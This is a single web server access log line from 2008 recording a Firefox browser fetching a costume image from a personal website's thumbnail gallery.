81.15.55.100 - - [22/Aug/2008:07:51:06 -0500] "GET /costume/costm48.jpg HTTP/1.1" 200 10085 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
